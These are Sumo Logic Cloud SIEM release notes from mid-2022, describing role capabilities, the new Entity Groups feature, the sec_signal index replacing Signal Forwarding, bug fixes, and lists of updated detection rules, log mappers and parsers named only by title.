These can be used when defining roles in the Sumo Logic platform (at Administration > Users and Roles > Roles).

(Screenshot: read-only roles)

(For those with Cloud SIEM instances in the jask.ai domain, these capabilities are accessed via the Configuration > Roles page in Cloud SIEM.)

Users with these capabilities (without the corresponding Manage capabilities) will be able to view the corresponding pages but will not be able to make changes on those pages. (Previously, users without the Manage capabilities could not see the corresponding pages.)

These permissions also apply to Cloud SIEM APIs, so View (only) capabilities can now be assigned if desired.

Minor Changes and Enhancements

  • [Updated] When Threat Intelligence polling fails, the corresponding event will now include more information about the specific error that occurred.
  • [Updated] The API endpoints that return information about Signals (GET /signals, GET /signals/<id>, and GET /signals/all) now include the summary field (previously only accessible via the UI).
  • [New] The Sumo Logic audit logs will now include events when a user adds or removes a Signal to/from an Insight, and when a user adds a comment to an Insight.

Resolved Issues

  • The GET /rules and GET /rules/<id> API endpoints did not require role capabilities for access; they now require either View Rules or Manage Rules.
  • Favorite Fields were not always being displayed on Signals generated by Threshold Rules.

July 14, 2022 - Application Update

Minor Changes and Enhancements

  • [Updated] The text size has been adjusted in some areas on the Rules details page to improve readability.

Resolved Issues

  • In some instances, after uploading Network Blocks via .csv file, they would fail to appear in the UI.

Announcement Update

The new Signal Index (recently announced) has been delayed, and will be available starting next week. As a result, the deprecation of the old Signal Forwarding feature will be delayed until September 22, 2022.

July 21 - Application Update

Entity Groups

There are a number of ways in which Entity attributes - tags, criticality and suppression - provide value to users of Cloud SIEM: for example, investigations can be completed faster with more context, Insights can be better prioritized with the appropriate severity, and false positive Signals from test instances can be prevented. However, setting those attributes has been a manual process, and keeping them in sync as new Entities are defined is difficult.

That's why we are pleased to announce a new feature called Entity Groups. By defining Entity Groups, attributes can be automatically applied (or removed) based on Entity value (name), IP address, or Inventory group membership. For example, all high-risk laptops will receive higher criticality -- even if such a laptop is added to your environment months later.

Entities can even be members of more than one Entity Group, so a high-risk laptop in the Austin office could both get a tag identifying its location and receive the higher criticality. And if you later reassigned it so that it was no longer in a high-risk group, the criticality would be automatically removed.

To create an Entity Group, a new configuration menu item has been added:

(Screenshot: entity groups menu)

On the Entity Groups page, click the Create button:

(Screenshot: entity groups list)

This will open the detail dialog:

(Screenshot: create entity group)

Here you can decide what attribute Group membership should be based on:

  • Group membership in your Inventory system (such as Active Directory)
  • Entity value (name) - prefix or suffix (such as "aus-" or "-public")
  • IP address range (for IP Address entities) defined using the CIDR format

Entity Groups also support sensor zones.

Then you can define what attribute(s) should be applied to member Entities - tags, criticality and/or suppression.

This release also includes API and Terraform support for Entity Groups.

More information about this exciting new feature and how to use it is in the documentation at Using Entity Groups.

Signal Index

Starting today, Signals generated by Cloud SIEM will be automatically saved in a new sec_signal index. This special partition is similar to the existing sec_record_* indices in that, unlike data retained using the older Signal Forwarding feature, it will be saved in proper JSON supporting keyword search and nested attributes.

The new index is automatically generated and retained for a period of 2 years at no additional cost for all Cloud SIEM customers.

As a result, the optional Signal Forwarding feature will be deprecated on September 22, 2022. Existing data will not be deleted but new Signals generated after that date will no longer be forwarded and the option will no longer be available in Cloud SIEM.

Customers leveraging Signal Forwarding data to generate dashboards (or for other use cases) will need to modify those applications to use the new sec_signal index before September 22.

Note that because the new index is a special partition, a single query cannot be used to search both the sec_signal index and older forwarded Signal data simultaneously.

More information about using the special security indices is in the documentation at Searching for Cloud SIEM Data in Sumo Logic.

Minor Changes and Enhancements

  • [Updated] The page used to configure the detection window and Insight threshold has moved. Where previously it was accessed from a button on the Custom Insights list page, it is now accessed via a new Workflow > Detection option in the Configuration menu:

(Screenshot: threshold menu)

Note the URL has also changed as a result; please update any bookmarks.

Resolved Issues

When navigating to a Cloud SIEM page (with sumologic.com in the domain name), if the user had to log in/authenticate first, they were not auto-forwarded to the appropriate Cloud SIEM page after doing so (but were instead taken to the Continuous Intelligence Platform home page). This has now been resolved and users will be auto-forwarded correctly.

July 21, 2021 - Content Release

Rules

  • [Updated] MATCH-S00587 Empire PowerShell Launch Parameters
  • [Updated] MATCH-S00161 Malicious PowerShell Get Commands
  • [Updated] MATCH-S00190 Malicious PowerShell Invoke Commands
  • [Updated] MATCH-S00191 Suspicious PowerShell Keywords

Log Mappers

  • [New] OSSEC Alert

Parsers

  • [New] /Parsers/System/OSSEC/OSSEC JSON
  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog
  • [Updated] /Parsers/System/Kubernetes/Kubernetes
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

July 14 - Content Release

Log Mappers

  • [New] Carbon Black Cloud Alert - Tuned Activity
  • [Updated] Cisco ASA 106001 JSON
  • [Updated] Cisco ASA 106002 JSON
  • [Updated] Cisco ASA 106006 JSON
  • [Updated] Cisco ASA 106007 JSON
  • [Updated] Cisco ASA 106010 JSON
  • [Updated] Cisco ASA 106012 JSON
  • [Updated] Cisco ASA 106014 JSON
  • [Updated] Cisco ASA 106015 JSON
  • [Updated] Cisco ASA 106021 JSON
  • [Updated] Cisco ASA 106027 JSON
  • [Updated] Cisco ASA 106100 JSON
  • [Updated] Cisco ASA 106102-3 JSON
  • [Updated] Cisco ASA 109005-8 JSON
  • [Updated] Cisco ASA 110002 JSON
  • [Updated] Cisco ASA 113004 JSON
  • [Updated] Cisco ASA 113005 JSON
  • [Updated] Cisco ASA 113012-17 JSON
  • [Updated] Cisco ASA 209004 JSON
  • [Updated] Cisco ASA 302020-1 JSON
  • [Updated] Cisco ASA 303002 JSON
  • [Updated] Cisco ASA 304001 JSON
  • [Updated] Cisco ASA 304002 JSON
  • [Updated] Cisco ASA 305011-12 JSON
  • [Updated] Cisco ASA 313001 JSON
  • [Updated] Cisco ASA 313004 JSON
  • [Updated] Cisco ASA 313005 JSON
  • [Updated] Cisco ASA 314003 JSON
  • [Updated] Cisco ASA 322001 JSON
  • [Updated] Cisco ASA 338001-8+338201-4 JSON
  • [Updated] Cisco ASA 4000nn JSON
  • [Updated] Cisco ASA 406001 JSON
  • [Updated] Cisco ASA 406002 JSON
  • [Updated] Cisco ASA 419001 JSON
  • [Updated] Cisco ASA 419002 JSON
  • [Updated] Cisco ASA 500004 JSON
  • [Updated] Cisco ASA 602303-4 JSON
  • [Updated] Cisco ASA 605004-5 JSON
  • [Updated] Cisco ASA 710002-3 JSON
  • [Updated] Cisco ASA 710005 JSON
  • [Updated] Cisco ASA tcp_udp_sctp_teardowns JSON

Parsers

  • [Updated] /Parsers/System/VMware/Carbon Black Cloud
  • [Updated] /Parsers/System/Cisco/Cisco ASA

July 8, 2022 - Application Update

Announcement

  • The built-in HipChat Action will be deprecated on August 25, 2022.

Minor Changes and Enhancements

  • [Updated] An option has been added to the Enrichments tab which allows the user to hide any empty fields in the results.

Resolved Issues

  • In some cases, changes to Rule Tuning Expressions were not being written to the Audit Logs properly.
  • Mapper field format_parameters was not populating.
  • Some of the links on the Related Entities tab of the Insight detail pages were malformed.

July 7, 2022 - Content Release

Rules

  • [New] MATCH-S00816 Interactive Logon to Domain Controller

Log Mappers

  • [Updated] Palo Alto GlobalProtect - Custom Parser
  • [Updated] Palo Alto GlobalProtect Auth - Custom Parser
  • [Updated] Windows - System - 7045
  • [Updated] Zscaler - Nanolog Streaming Service - JSON

Parsers

  • [Updated] /Parsers/System/F5/F5 Syslog
  • [Updated] /Parsers/System/Google/GCP
  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] THRESHOLD-S00096 Brute Force Attempt
  • [Updated] MATCH-S00565 Direct Outbound DNS Traffic
  • [Updated] THRESHOLD-S00103 Domain Brute Force Attempt
  • [Updated] THRESHOLD-S00102 Domain Password Attack
  • [Updated] THRESHOLD-S00099 Long URL Containing SQL Commands
  • [Updated] THRESHOLD-S00095 Password Attack
  • [Updated] CHAIN-S00008 Successful Brute Force
  • [Updated] MATCH-S00185 Windows - Remote System Discovery

July 5, 2022 - Content Release

Rules

  • [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
  • [Updated] THRESHOLD-S00096 Brute Force Attempt
  • [Updated] MATCH-S00565 Direct Outbound DNS Traffic
  • [Updated] THRESHOLD-S00103 Domain Brute Force Attempt
  • [Updated] THRESHOLD-S00102 Domain Password Attack
  • [Updated] THRESHOLD-S00099 Long URL Containing SQL Commands
  • [Updated] THRESHOLD-S00095 Password Attack
  • [Updated] CHAIN-S00008 Successful Brute Force
  • [Updated] MATCH-S00185 Windows - Remote System Discovery

Log Mappers

  • [Updated] McAfee Endpoint Security Custom Parser
  • [Updated] Microsoft SQL Server Parser - Authentication

Parsers

  • [Updated] /Parsers/System/Linux/Linux OS Syslog
  • [Updated] /Parsers/System/McAfee/McAfee EPO XML
  • [Updated] /Parsers/System/Microsoft/Microsoft SQL Server
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV
  • [Updated] /Parsers/System/Twistlock/Twistlock

June 24, 2022 - Announcement

Beginning July 15, 2022, Signals generated by Cloud SIEM will be automatically saved in a new sec_signals index. This index/special partition will be similar to the existing sec_record_ indices in that, unlike data retained using the older Signal Forwarding feature, it will be saved in proper JSON supporting keyword search and nested attributes.

The new index will be automatically generated and retained for a period of 2 years at no additional cost for all Cloud SIEM customers.

As a result, the optional Signal Forwarding feature in Cloud SIEM will be deprecated on September 15, 2022. Existing data will not be deleted but new Signals generated after that date will no longer be forwarded and the option will no longer be available in Cloud SIEM.

Customers leveraging Signal Forwarding data to generate dashboards (or for other use cases) will need to modify those applications to use the new sec_signals index before September 15.

If you have any questions or concerns, please contact Sumo Logic customer support.


June 24, 2022 - Application Update

Minor Changes and Enhancements

  • [New] On the Insight details pages, if the user has selected the Show Related Signals option, the related Signals will appear on the Signals Timeline graph.

Resolved Issues

  • The /sec/v1/insights/{}/tags API endpoint was returning a 500/INTERNAL_SERVER_ERROR.

June 21, 2022 - Content Release

Log Mappers

  • [Updated] McAfee Avecto Defendpoint

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/McAfee/McAfee EPO XML

June 15, 2022 - Content Release

Rules

  • [Updated] MATCH-S00400 Web Download via Office Binaries

Log Mappers

  • [New] GCP Parser - Load Balancer

Parsers

  • [Updated] /Parsers/System/Google/GCP
  • [Updated] /Parsers/System/Orca Security/Orca Security
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

June 13, 2022 - Application Update

Minor Changes and Enhancements

  • [Updated] List filters have been updated to better support custom Entity types; users no longer have to specify the Entity type in order to filter by Entity value (i.e. name). Old bookmarks will continue to work.
  • [Updated] On the Insight Details pages, the sort order for Signals has been reverted to oldest first. As always, the user can change the sort order and in an upcoming release, the UI will be updated to retain the user's selected sort order across sessions.
  • [Deleted] The standalone Suppressed Entities list page has been removed from the UI as it was confusing to users. To retrieve a list of suppressed Entities, users should filter the Entities list page.

Resolved Issues

  • CSV upload for Network Blocks was not working unless the (optional) "label" field was provided.
  • When filtering lists by date, the "include current" checkbox was not working consistently.

June 9, 2022 - Content Release

Rules

  • [New] MATCH-S00815 Threat Intel - Successful Authentication from Threat IP
  • [Updated] MATCH-S00687 Linux Security Tool Usage
  • [Updated] MATCH-S00555 Threat Intel - Inbound Traffic Context

Log Mappers

  • [Updated] Cyber Ark Vault JSON

Parsers

  • [New] /Parsers/System/Cyber-Ark/Cyber-Ark Vault - CEF
  • [Updated] /Parsers/System/AWS/AWS ELB
  • [Updated] /Parsers/System/AWS/AWS WAF

June 7, 2022 - Content Release

Rules

  • [Updated] MATCH-S00814 Abnormal Child Process - sdiagnhost.exe - CVE-2022-30190
  • [Updated] MATCH-S00147 WMI Managed Object Format (MOF) Process Execution

Log Mappers

  • [New] Bitdefender - avc
  • [New] Bitdefender - fw
  • [New] Bitdefender - hd
  • [New] Bitdefender - network-monitor
  • [New] Bitdefender - new-incident
  • [New] Linux OS Syslog - Cron - Generic
  • [New] Linux OS Syslog - sshd - session timeout
  • [Updated] Bitdefender Catch All
  • [Updated] SonicWall Firewall - Custom Parser

Parsers

  • [Updated] /Parsers/System/Dell/Dell SonicWall
  • [Updated] /Parsers/System/Linux/Linux OS Syslog

June 3, 2022 - Content Release

Rules

  • [New] MATCH-S00814 Abnormal Child Process - sdiagnhost.exe - CVE-2022-30190
  • [New] MATCH-S00813 Microsoft Support Diagnostic Tool Invoking PowerShell - CVE-2022-30190
  • [New] MATCH-S00812 Microsoft Support Diagnostic Tool with BrowseForFile - CVE-2022-30190
  • [Updated] THRESHOLD-S00080 Internal Port Scan
  • [Updated] MATCH-S00811 MS Office Product Spawning Msdt.exe - CVE-2022-30190

Log Mappers

  • [New] Google G Suite - logout
  • [New] McAfee Mvision ENS incidents - Parser
  • [New] McAfee Mvision ENS threats - Parser
  • [New] Okta Authentication - auth_via_AD_agent
  • [New] Okta Authentication - auth_via_mfa
  • [New] Okta Authentication - auth_via_radius
  • [New] Okta Authentication - sso
  • [Updated] Google G Suite - login.login
  • [Updated] Okta Authentication Events
  • [Updated] Salesforce LoginAs Mapping

Parsers

  • [New] /Parsers/System/McAfee/McAfee Mvision ENS

Schema

  • [Updated] device_ip_asnNumber
  • [Updated] device_ip_asnOrg
  • [Updated] device_ip_city
  • [Updated] device_ip_countryCode
  • [Updated] device_ip_countryName
  • [Updated] device_ip_isp
  • [Updated] device_ip_latitude
  • [Updated] device_ip_longitude
  • [Updated] device_ip_region
  • [Updated] device_natIp_asnNumber
  • [Updated] device_natIp_asnOrg
  • [Updated] device_natIp_city
  • [Updated] device_natIp_countryCode
  • [Updated] device_natIp_countryName
  • [Updated] device_natIp_isp
  • [Updated] device_natIp_latitude
  • [Updated] device_natIp_longitude
  • [Updated] device_natIp_region
  • [Updated] dns_replyIp_asnNumber
  • [Updated] dns_replyIp_asnOrg
  • [Updated] dns_replyIp_city
  • [Updated] dns_replyIp_countryCode
  • [Updated] dns_replyIp_countryName
  • [Updated] dns_replyIp_isp
  • [Updated] dns_replyIp_latitude
  • [Updated] dns_replyIp_longitude
  • [Updated] dns_replyIp_region
  • [Updated] dstDevice_ip_asnNumber
  • [Updated] dstDevice_ip_asnOrg
  • [Updated] dstDevice_ip_city
  • [Updated] dstDevice_ip_countryCode
  • [Updated] dstDevice_ip_countryName
  • [Updated] dstDevice_ip_isp
  • [Updated] dstDevice_ip_latitude
  • [Updated] dstDevice_ip_longitude
  • [Updated] dstDevice_ip_region
  • [Updated] srcDevice_ip_asnNumber
  • [Updated] srcDevice_ip_asnOrg
  • [Updated] srcDevice_ip_city
  • [Updated] srcDevice_ip_countryCode
  • [Updated] srcDevice_ip_countryName
  • [Updated] srcDevice_ip_isp
  • [Updated] srcDevice_ip_latitude
  • [Updated] srcDevice_ip_longitude
  • [Updated] srcDevice_ip_region

June 1, 2022 - Announcement

Geographical Data for IP Addresses

  • As previously announced, Cloud SIEM has switched to a new provider for geographical data for IP addresses. One consequence of this change is that the various _isp enrichment fields (listed below) are no longer being populated. However, that data is available in the equivalent _asnOrg fields (such as device_ip_asnOrg). If you have any rules that leverage the _isp fields, please switch to the _asnOrg fields as soon as possible.
  • Because these fields will no longer be populated, they will be removed on June 7, 2022:
    • device_ip_isp
    • device_natIp_isp
    • device_replyIp_isp
    • dstDevice_ip_isp
    • dstDevice_natIp_isp
    • srcDevice_ip_isp
    • srcDevice_natIp_isp

May 31, 2022 - Content Release

Rules

  • [New] MATCH-S00811 MS Office Product Spawning Msdt.exe - CVE-2022-30190
  • [Updated] MATCH-S00612 GCP Audit Secrets Manager Activity
  • [Updated] MATCH-S00766 Okta MFA Deactivated for User
  • [Updated] THRESHOLD-S00101 Sharepoint - Excessive Documents Accessed
  • [Updated] THRESHOLD-S00100 Sharepoint - Excessive Documents Downloaded

Log Mappers

  • [New] Aruba ClearPass User Authentication Failed
  • [New] Aruba ClearPass User Authentication Successful
  • [New] Cisco Secure Email Parser - Catch All
  • [New] Exabeam Parser - Catch All
  • [New] Jamf Parser - Catch All
  • [New] Juniper SRX Series Firewall - Parser
  • [New] McAfee Network Security Parser - Catch All
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft 365 Defender
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft IPC
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft Office 365 Security and Compliance
  • [New] Orca Security Parser - Catch All
  • [New] Squid Proxy - Parser
  • [New] Thinkst Canary Parser - Catch All
  • [New] Zscaler Workload Segmentation Catch All - Parser
  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - CreateTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - DeleteTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StartLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StopLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - UpdateTrail
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - AttachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - AuthorizeSecurityGroupIngress
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DetachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - ImportKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclAssociation
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclEntry
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - AttachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreateAccessKey
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicyVersion
  • [Updated] CloudTrail - iam.amazonaws.com - CreateUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeletePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - UpdateAssumeRolePolicy
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - kms.amazonaws.com - ScheduleKeyDeletion
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogGroup
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - CreateBucket
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketReplication
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - CheckMfa
  • [Updated] CloudTrail - signin.amazonaws.com - ConsoleLogin
  • [Updated] CloudTrail - signin.amazonaws.com - ExitRole
  • [Updated] CloudTrail - signin.amazonaws.com - RenewRole
  • [Updated] CloudTrail - signin.amazonaws.com - SwitchRole
  • [Updated] CloudTrail - sso.amazonaws.com - Federate
  • [Updated] CloudTrail - sso.amazonaws.com - ListProfilesForApplication
  • [Updated] CloudTrail Default Mapping
  • [Updated] Cloudflare - Logpush
  • [Updated] Egnyte DLP Parser - Catch All
  • [Updated] Linux OS Syslog - Process kernel - Promiscuous Mode Change
  • [Updated] Okta Authentication Events
  • [Updated] Okta Catch All
  • [Updated] Okta Security Threat Events
  • [Updated] Windows - Security - 4688

Parsers

  • [New] /Parsers/System/Cisco/Cisco Secure Email
  • [New] /Parsers/System/Exabeam/Exabeam Security Management Platform (SMP) Syslog
  • [New] /Parsers/System/Jamf/Jamf
  • [New] /Parsers/System/Juniper/Juniper SRX Series Firewall Syslog
  • [New] /Parsers/System/McAfee/McAfee Network Security
  • [New] /Parsers/System/Orca Security/Orca Security
  • [New] /Parsers/System/Squid/Squid Proxy Syslog
  • [New] /Parsers/System/Thinkst Canary/Thinkst Canary
  • [New] /Parsers/System/Zscaler/Zscaler Workload Segmentation/Zscaler Workload Segmentation JSON
  • [Updated] /Parsers/System/HP/Aruba ClearPass - Syslog
  • [Updated] /Parsers/System/CrowdStrike/CrowdStrike Falcon Endpoint - JSON
  • [Updated] /Parsers/System/Egnyte/Egnyte DLP
  • [Updated] /Parsers/System/F5/F5 Syslog
  • [Updated] /Parsers/System/Linux/Linux OS Syslog
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV
  • [Updated] /Parsers/System/Shared/Syslog Headers
  • [Updated] /Parsers/System/Twistlock/Twistlock

May 27, 2022 - Application Update

Upcoming Changes

  • [Updated] Starting later next week, the severity attribute in audit log records for Insights (such as InsightCreated) will be changing. Instead of a number (represented as a string) from 1 to 4, the value will be a human-readable string matching the values in the UI (LOW, MEDIUM, HIGH, CRITICAL). Please update any dashboards or other consumers of this data.
  • [Deleted] Later next week, the **Content** > **Suppressed Entities** page will be removed from the UI to simplify the application. Instead, users can use a filter on the **Content** > **Entities** page to retrieve the list of suppressed Entities.

Minor Changes and Enhancements

  • [Updated] On the Insight Details pages, Signals are now sorted in order of the most recent Signal first by default. (As always, the user can change the sort order.)
  • [New] When creating a copy of a Rule, users are now given the option to apply the Rule Tuning Expression(s) that are applied on the original Rule to the copy as well.
  • [New] In the Cloud SIEM UI, timestamps now explicitly include the time zone.
  • [New] Users can now specify a maximum look-back window (in days) for TAXII feeds.
  • [New] The current status (enabled/disabled) for each feed is now displayed on the Threat Intelligence list page.

Resolved Issues

  • If a user had defined a high number of favorite fields, the system would show only the first 50.
  • When specifying tags, the auto-complete feature was not working properly in some instances.

May 26, 2022 - Content Release

Rules

  • [Updated] MATCH-S00612 GCP Audit Secrets Manager Activity
  • [Updated] THRESHOLD-S00101 Sharepoint - Excessive Documents Accessed
  • [Updated] THRESHOLD-S00100 Sharepoint - Excessive Documents Downloaded

Log Mappers

  • [New] Cisco Secure Email Parser - Catch All
  • [New] Exabeam Parser - Catch All
  • [New] Jamf Parser - Catch All
  • [New] Juniper SRX Series Firewall - Parser
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft 365 Defender
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft IPC
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft Office 365 Security and Compliance
  • [New] Squid Proxy - Parser
  • [New] Thinkst Canary Parser - Catch All
  • [New] Zscaler Workload Segmentation Catch All - Parser
  • [Updated] Egnyte DLP Parser - Catch All
  • [Updated] Linux OS Syslog - Process kernel - Promiscuous Mode Change

Parsers

  • [New] /Parsers/System/Cisco/Cisco Secure Email
  • [New] /Parsers/System/Exabeam/Exabeam Security Management Platform (SMP) Syslog
  • [New] /Parsers/System/Jamf/Jamf
  • [New] /Parsers/System/Juniper/Juniper SRX Series Firewall Syslog
  • [New] /Parsers/System/Squid/Squid Proxy Syslog
  • [New] /Parsers/System/Thinkst Canary/Thinkst Canary
  • [New] /Parsers/System/Zscaler/Zscaler Workload Segmentation/Zscaler Workload Segmentation JSON
  • [Updated] /Parsers/System/CrowdStrike/CrowdStrike Falcon Endpoint - JSON
  • [Updated] /Parsers/System/Egnyte/Egnyte DLP
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

May 17, 2022 - Application Update

Minor Changes and Enhancements

  • [Updated] The _sourceName and _sourceHost values in records ingested by Cloud SIEM will now reflect the original values defined when ingested into the Sumo Logic platform.
  • [Updated] The "Board" list view for Insights has been updated to include the resolution:

board-view

Resolved Issues

  • In the new Entities tab in Insights, duplicate Entities were sometimes listed if the raw and normalized names didn't match. Also, the cards will now respond better to very low screen/browser widths.
  • When viewing some verbose content (like Record properties), mousing over the content would cause it to reflow.
  • When creating match list items via Terraform, the process was occasionally timing out.
  • Email-based actions were not functioning properly on instances with domains ending in jask.ai.

May 12, 2022 - Content Release

Rules

  • [Updated] LEGACY-S00078 SQL Injection Victim

Log Mappers

  • [New] Check Point Application Control
  • [New] Check Point SmartDefense
  • [New] Check Point URL Filtering
  • [Updated] Check Point Block

Parsers

  • [Updated] /Parsers/System/Check Point/Check Point Firewall JSON
  • [Updated] /Parsers/System/Check Point/Check Point Firewall Syslog
  • [Updated] /Parsers/System/Microsoft/Office 365

May 10, 2022 - Content Release

Rules

  • [Deleted] MATCH-S00258 Authentication Brute Force Attempt
  • [Updated] MATCH-S00176 RDP Login from Localhost

Log Mappers

  • [Deleted] Windows - Microsoft-Windows-PowerShell/Operational - 4103 - CIP
  • [Deleted] Windows - Microsoft-Windows-PowerShell/Operational - 4104 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 1 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 10 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 11 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 12, 13, and 14 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 15 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 2 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 3 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 4 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 5 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 6 - CIP
  • [Deleted] Windows - Microsoft-Windows-Sysmon/Operational - 8 - CIP
  • [Deleted] Windows - Security - 1100 - CIP
  • [Deleted] Windows - Security - 1102 - CIP
  • [Deleted] Windows - Security - 4624 - CIP
  • [Deleted] Windows - Security - 4625 - CIP
  • [Deleted] Windows - Security - 4634 - CIP
  • [Deleted] Windows - Security - 4648 - CIP
  • [Deleted] Windows - Security - 4649 - CIP
  • [Deleted] Windows - Security - 4656 - CIP
  • [Deleted] Windows - Security - 4658 - CIP
  • [Deleted] Windows - Security - 4661 - CIP
  • [Deleted] Windows - Security - 4662 - CIP
  • [Deleted] Windows - Security - 4663 - CIP
  • [Deleted] Windows - Security - 4672 - CIP
  • [Deleted] Windows - Security - 4674 - CIP
  • [Deleted] Windows - Security - 4688 - CIP
  • [Deleted] Windows - Security - 4689 - CIP
  • [Deleted] Windows - Security - 4697 - CIP
  • [Deleted] Windows - Security - 4698 - CIP
  • [Deleted] Windows - Security - 4702 - CIP
  • [Deleted] Windows - Security - 4704 - CIP
  • [Deleted] Windows - Security - 4720 - CIP
  • [Deleted] Windows - Security - 4726 - CIP
  • [Deleted] Windows - Security - 4728 - CIP
  • [Deleted] Windows - Security - 4732 - CIP
  • [Deleted] Windows - Security - 4740 - CIP
  • [Deleted] Windows - Security - 4742 - CIP
  • [Deleted] Windows - Security - 4754 - CIP
  • [Deleted] Windows - Security - 4755 - CIP
  • [Deleted] Windows - Security - 4756 - CIP
  • [Deleted] Windows - Security - 4768 - CIP
  • [Deleted] Windows - Security - 4769 - CIP
  • [Deleted] Windows - Security - 4770 - CIP
  • [Deleted] Windows - Security - 4771 - CIP
  • [Deleted] Windows - Security - 4776 - CIP
  • [Deleted] Windows - Security - 4778 - CIP
  • [Deleted] Windows - Security - 4779 - CIP
  • [Deleted] Windows - Security - 4780 - CIP
  • [Deleted] Windows - Security - 4793 - CIP
